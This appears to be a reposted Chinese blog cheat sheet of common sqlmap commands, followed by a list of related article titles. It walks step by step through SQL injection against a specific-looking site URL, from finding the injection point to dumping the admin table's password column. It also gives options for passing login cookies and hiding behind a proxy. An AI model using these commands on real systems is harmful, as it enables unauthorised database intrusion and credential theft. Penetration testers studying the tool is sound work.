sqlmap常用命令
来源:互联网 发布:c语言字符串查找 编辑:程序博客网 时间:2024/05/05 03:14
sqlmap是一个灰常强大的sql注入检测与辅助工具,但是由于没有图形界面,基本上用起来比较麻烦,导致很多人可能宁愿用havij或者是pangolin也不愿意麻烦去翻帮助界面,我自己也是把很多语句贴到了一个记事本里面用,其实真正用起来也就5,6句,也不会太复杂,下文以php+mysql为例:
- 检查注入点
sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11
- 列数据库信息
sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --dbs
- 指定库名列出所有表
sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 --tables
- 指定库名表名列出所有字段
sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin --columns
- 指定库名表名字段dump出指定字段
sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password --dump
有几个参数可能会用到,直接加在最后面就可以了,更多详细参数见官方文档:
--cookie=COOKIE 在需要登录的地方,需要登录后的cookie
--proxy="http://127.0.0.1:8087" 使用HTTP代理隐藏自己的身份,比如使用goagent等
--sql-query=QUERY 执行一个sql语句,不一定支持
过程的几张图如下:
来自 http://www.nigesb.com/sqlmap-common-usage-and-examples.html
0 0
- sqlmap常用命令
- sqlmap常用命令
- sqlmap常用命令
- sqlmap常用命令
- sqlmap常用命令
- sqlmap常用命令语句
- sqlmap
- sqlmap
- sqlmap
- SQLmap
- SQLMap
- sqlmap
- sqlmap
- SQLMAP
- sqlmap
- sqlmap
- SQLMap--SQLMap使用方法
- sqlMap配置
- hadoop日志分析
- qtcreator 无法输入中文解决方法
- 引入了支付宝极简SDK后, System.loadLibrary("cocos2dcpp"); 的问题
- html hidden属性,表单提示
- 3G? 2G? 2.5G? 4G? 与 WIFI, GPRS,CDMA 3G无线上网
- sqlmap常用命令
- July的逻辑题的一些答案分析
- 字符串原地压缩
- OAuth
- 压抑
- CentOS svn 安装与配置方法
- 我的学生信息管理系统总结
- OC学习10——工厂方法
- 从零开始,创建GitHub团队开发环境